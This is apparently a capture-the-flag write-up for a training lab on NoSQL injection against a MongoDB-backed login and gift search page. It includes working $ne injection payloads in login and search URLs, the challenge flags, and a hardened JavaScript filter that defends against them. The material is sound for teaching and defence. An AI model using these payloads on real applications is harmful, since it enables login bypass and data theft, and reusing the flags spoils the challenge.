
# \[Day 7] Migration Without Security

Logging into the server with the given credentials, I was able to interact with the MongoDB and retrieve the first flag.

![](/files/hHpsdx8wpeDOM2ViIX1h)

{% hint style="success" %}
Interact with the MongoDB server to find the flag. What is the flag?

* THM{8814a5e6662a9763f7df23ee59d944f9}
{% endhint %}

The following page is served over HTTP on port 80:

![](/files/kVWfKv0L8mEurYkLYVZw)

**Useful MongoDB Operators**

```
$eq - matches records that are equal to a certain value

$ne - matches records that are not equal to a certain value

$gt - matches records that are greater than a certain value

$where - matches records based on a JavaScript condition

$exists - matches records that have a certain field

$regex - matches records that satisfy a certain regular expression
```

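Bypassing the login page is as simple as using the `$ne` operator on the password field: a not-equal comparison against an arbitrary value is true for the stored password, so the password check passes without knowing it.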

![](/files/LCMcPjsbK2MOXvFtdlQ8)

![](/files/NB5EFcv6Y4u9Yu1oPair)

![](/files/BaImW20JCWiNWCkUrwAu)

We're in.

![](/files/FK81UKKfgLBSHZHnaJGU)

{% hint style="success" %}
THM{b6b304f5d5834a4d089b570840b467a8}
{% endhint %}

```
10.10.121.120/search?username[$ne]=admin&role=guest
```

![](/files/tzipA6opkt6iTqskOVFr)

{% hint style="success" %}
Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?

* THM{2ec099f2d602cc4968c5267970be1326}
{% endhint %}

```
http://10.10.121.120/search?username=mcskidy&role[$ne]=guest
```

![](/files/Vsqq3KwWaKlT8gxIJpm8)

{% hint style="success" %}
Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?

* ID:6184f516ef6da50433f100f4:mcskidy:admin
{% endhint %}
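
Why the two search URLs above return records, and the server-side check that stops them, shown as an added example that is not part of the original write-up or the challenge application. It assumes the application parses bracket notation into nested objects (as qs-style parsers do) and passes the result to MongoDB as the query filter; `parseQuery`, `find`, `safeFilter` and the guest records are hypothetical stand-ins.

```javascript
// Added example. Records below are constructed; only "mcskidy" comes from the page.
const USERS = [
  { username: "mcskidy", role: "admin" },
  { username: "guest-one", role: "guest" },
  { username: "guest-two", role: "guest" },
];

// Parse bracket notation the way qs-style parsers do:
// "role[$ne]=guest" becomes { role: { $ne: "guest" } }.
function parseQuery(qs) {
  const out = Object.create(null); // no prototype, so "__proto__" is just a key
  for (const [key, value] of new URLSearchParams(qs)) {
    const m = /^([^\[\]]+)\[([^\[\]]+)\]$/.exec(key);
    if (!m) { out[key] = value; continue; }
    if (typeof out[m[1]] !== "object") out[m[1]] = Object.create(null);
    out[m[1]][m[2]] = value;
  }
  return out;
}

// Stand-in for a MongoDB find(): plain equality plus $eq and $ne only.
function find(records, filter) {
  return records.filter((rec) =>
    Object.entries(filter).every(([field, cond]) => {
      if (typeof cond !== "object" || cond === null) return rec[field] === cond;
      return Object.entries(cond).every(([op, v]) =>
        op === "$eq" ? rec[field] === v : op === "$ne" ? rec[field] !== v : false);
    }));
}

// Hardened filter builder: each expected parameter must be a plain string,
// so an operator object such as { $ne: "guest" } is rejected, not forwarded.
function safeFilter(query, fields) {
  const filter = {};
  for (const f of fields) {
    if (typeof query[f] !== "string") throw new TypeError(`${f} must be a string`);
    filter[f] = query[f];
  }
  return filter;
}

// Vulnerable: the parsed query is handed to the database as the filter.
const searchVulnerable = (qs) => find(USERS, parseQuery(qs));
// Hardened: only string values for known fields ever reach the filter.
const searchHardened = (qs) =>
  find(USERS, safeFilter(parseQuery(qs), ["username", "role"]));
```

In a real handler the `TypeError` would map to an HTTP 400 response; schema validation at the route boundary achieves the same type check.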
